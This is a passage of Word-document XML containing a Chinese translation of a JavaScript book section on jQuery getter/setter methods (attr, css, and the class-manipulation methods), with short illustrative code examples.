      </w:r>
      <w:r>
        <w:t>用做</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>时，这些方法会给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的每一个元素设置值，然后返回该</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象以方便链式调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用做</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>时，这</w:t>
      </w:r>
      <w:r>
        <w:t>些方法只会查询元素集中的第一个元素，返回单个值。（如果要遍历所有元素，请使用</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>。）</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>不会返回调用自身的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因此它只能出现在链式调用的末尾。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用做</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>时，这些方法经常接受对象参数。在这种情况下，该对象的每一个属性都指定一个需要设置的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用做</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>时，这些方法经常接受函数参数。在这种情况下，会调用该函数来计算需要设置的值。调用该函数时的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值是对应的元素，第一个参数是该元素的索引值，当前值则作为第二参数传入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>阅读本节接下来的内容时，请将对</w:t>
      </w:r>
      <w:r>
        <w:t>gette</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>的概要理解牢记于心。下面的每一节会讲述</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery getter/setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法中的一个重要类别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="19_2_1_Huo_Qu_He_She_Zhi_HTMLShu_Xing_"/>
      <w:r>
        <w:t>19.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　获取和设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>attr()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>中用于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>getter/setter</w:t>
      </w:r>
      <w:r>
        <w:t>，它符合上面描述的概要理解中的每一条。</w:t>
      </w:r>
      <w:r>
        <w:t>attr()</w:t>
      </w:r>
      <w:r>
        <w:t>处理浏览器的兼容性和一些特殊情况，还让</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性名和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性名可以等同使用（当二者存在差异时）。例如，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"for"</w:t>
      </w:r>
      <w:r>
        <w:t>也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"htmlFor"</w:t>
      </w:r>
      <w:r>
        <w:t>，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"class"</w:t>
      </w:r>
      <w:r>
        <w:t>也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"className"</w:t>
      </w:r>
      <w:r>
        <w:t>。一个相</w:t>
      </w:r>
      <w:r>
        <w:t>关函数是</w:t>
      </w:r>
      <w:r>
        <w:t>removeAttr()</w:t>
      </w:r>
      <w:r>
        <w:t>，可用来从所有选中元素中移除某个属性。下面是一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("form").attr("action");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取第一个</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#icon").attr("src","icon.gif");//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#banner").attr({src:"banner.gif",//</w:t>
      </w:r>
      <w:r>
        <w:t>一次性设置</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alt:"Advertisement",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>width:720,height:64});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a").attr("target","_blank");//</w:t>
      </w:r>
      <w:r>
        <w:t>使所有链接在新窗口中打开</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a").attr("target",function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>使站内链接在本窗口中打开，并且让</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.host==location.host)return"_self"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return"_blank";//</w:t>
      </w:r>
      <w:r>
        <w:t>非站内链接在新窗口中打开</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a").attr({target:function(){...}});//</w:t>
      </w:r>
      <w:r>
        <w:t>可以像这样传入函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a").removeAttr("target");</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>让所有链接在本窗口中打开</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="19_2_2_Huo_Qu_He_She_Zhi_CSSShu_Xing_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>19.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　获取和设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>attr()</w:t>
      </w:r>
      <w:r>
        <w:t>方法很类似，只是</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>方法作用于元素的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式，而不是元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在获取样式值时，</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的是元素的当前样式（或称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>样式，参考</w:t>
      </w:r>
      <w:r>
        <w:t>16.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）：返回值可能来自</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性也可能来自样式表。注意：不能获取复合样式的值，比如</w:t>
      </w:r>
      <w:r>
        <w:t>"font"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"margin"</w:t>
      </w:r>
      <w:r>
        <w:t>。而应该获取单个样式的值，比如</w:t>
      </w:r>
      <w:r>
        <w:t>"font-weight"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"font-family"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"margin-top"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"margin-left"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>在设置样式时，</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会将样式简单添加到该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性中。</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>方法允许在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式名中使用连字符（</w:t>
      </w:r>
      <w:r>
        <w:t>"background-color"</w:t>
      </w:r>
      <w:r>
        <w:t>）或使用驼峰格式</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>样式名（</w:t>
      </w:r>
      <w:r>
        <w:t>"backgroundColor"</w:t>
      </w:r>
      <w:r>
        <w:t>）。在获取样式值时，</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>会把数值转换成带有单位后缀的字符串返回。而在设置样式值时，则会将数值转化成字符串，在必要时添加</w:t>
      </w:r>
      <w:r>
        <w:t>"px"</w:t>
      </w:r>
      <w:r>
        <w:t>（像素）后缀：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").css("font-weight");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞的字体重量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").css("fontWeig</w:t>
      </w:r>
      <w:r>
        <w:t>ht");//</w:t>
      </w:r>
      <w:r>
        <w:t>也可以采用驼峰格式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").css("font");//</w:t>
      </w:r>
      <w:r>
        <w:t>错误：不可获取复合样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").css("font-variant",//</w:t>
      </w:r>
      <w:r>
        <w:t>将样式设置在所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"smallcaps");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div.note").css("border",//</w:t>
      </w:r>
      <w:r>
        <w:t>设置复合样式是</w:t>
      </w:r>
      <w:r>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"solid black 2px");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").css({backgroundColor:"black",//</w:t>
      </w:r>
      <w:r>
        <w:t>一次设置多个样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>textColor:"white",//</w:t>
      </w:r>
      <w:r>
        <w:t>也可以用驼峰格式的名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>fon</w:t>
      </w:r>
      <w:r>
        <w:t>tVariant:"small-caps",//</w:t>
      </w:r>
      <w:r>
        <w:t>对象属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding:"10px 2px 4px 20px",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>border:"dotted black 4px"});//</w:t>
      </w:r>
      <w:r>
        <w:t>让所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞的字体大小增加</w:t>
      </w:r>
      <w:r>
        <w:t>25%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").css("font-size",function(i,curval){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Math.round(1.25*parseInt(curval));</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68" w:name="19_2_3_Huo_Qu_He_She_Zhi_CSSLei_"/>
      <w:r>
        <w:t>19.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　获取和设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回忆一下，</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值（在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>里通过</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>访问）会被解析成为一个由空格分隔的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类名列表。通常，我们想要往列表中添加、删除某一项，或判断某一项是否在列表中，而不是将该列表替换为另一个。因此，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一些便捷方法用来操作</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>addClass()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeClass()</w:t>
      </w:r>
      <w:r>
        <w:t>用来从选中元素中添加和删除类。</w:t>
      </w:r>
      <w:r>
        <w:t>toggleClass()</w:t>
      </w:r>
      <w:r>
        <w:t>的用途是，当元素还没有某些类时，给元素添加这些类；反之，则删除。</w:t>
      </w:r>
      <w:r>
        <w:t>hasClass()</w:t>
      </w:r>
      <w:r>
        <w:t>用来判断某类是否存在。下面是一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").addClass("hilite");//</w:t>
      </w:r>
      <w:r>
        <w:t>给所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素添加一个类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1+p").addClass("hilite first");//</w:t>
      </w:r>
      <w:r>
        <w:t>给＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞后面的＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞添加两个类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("section").addClass(function(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>传递一个函数用来给匹配的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"section"+n;//</w:t>
      </w:r>
      <w:r>
        <w:t>每一个元素添加自定义类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("p").removeClass("hilite");//</w:t>
      </w:r>
      <w:r>
        <w:t>从所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中删除一个类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("p").removeClass("hilite first");//</w:t>
      </w:r>
      <w:r>
        <w:t>允许一次删除多个类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("section").removeClass(function(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>从元素中删除自定义类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"section"+n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").removeClass();//</w:t>
      </w:r>
      <w:r>
        <w:t>删除所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞中的所有类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>切换</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("tr:odd").toggleClass("oddrow");//</w:t>
      </w:r>
      <w:r>
        <w:t>如果该类不存在则添加</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果存在则删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").toggleClass("big bold"</w:t>
      </w:r>
      <w:r>
        <w:t>);//</w:t>
      </w:r>
      <w:r>
        <w:t>一次切换两个类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").toggleClass(function(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>切换用函数计算出来的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"big bold h1-"+n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").toggleClass("hilite",true);//</w:t>
      </w:r>
      <w:r>
        <w:t>作用类似</w:t>
      </w:r>
      <w:r>
        <w:t>addClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").toggleClass("hilite",false);//</w:t>
      </w:r>
      <w:r>
        <w:t>作用类似</w:t>
      </w:r>
      <w:r>
        <w:t>removeClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("p").hasClass("first")//</w:t>
      </w:r>
      <w:r>
        <w:t>是否所有</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>元素都有该类？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#lead").is(".first")//</w:t>
      </w:r>
      <w:r>
        <w:t>功能和上面类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#lead").is(".first.hilite")//is()</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>hasClass()</w:t>
      </w:r>
      <w:r>
        <w:t>更灵活</w:t>
      </w:r>
    </w:p>
